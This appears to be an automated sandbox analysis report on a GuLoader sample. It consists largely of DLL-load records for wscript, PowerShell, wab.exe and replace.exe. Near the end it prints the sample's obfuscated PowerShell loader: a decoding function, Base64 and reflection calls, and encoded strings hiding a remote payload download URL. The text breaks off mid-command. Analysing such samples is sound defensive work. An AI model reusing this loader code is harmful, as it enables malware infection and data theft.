        Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007489000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007390000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdb source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.1913857979.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdbGCTL source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdbS] source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnter", "0")
        Yara detected GuLoader
        Source: Yara matchFile source: 00000005.00000002.1925873390.00000000091BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1925751155.0000000008790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1919062447.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fastlandssoklerne235 $Nbenes $Grundfladernes), (Aperitiffer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trihedra = [AppDomain]::CurrentDomain.GetAssemb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afficerendes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Februaraften, $false).DefineType($udblokke,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta 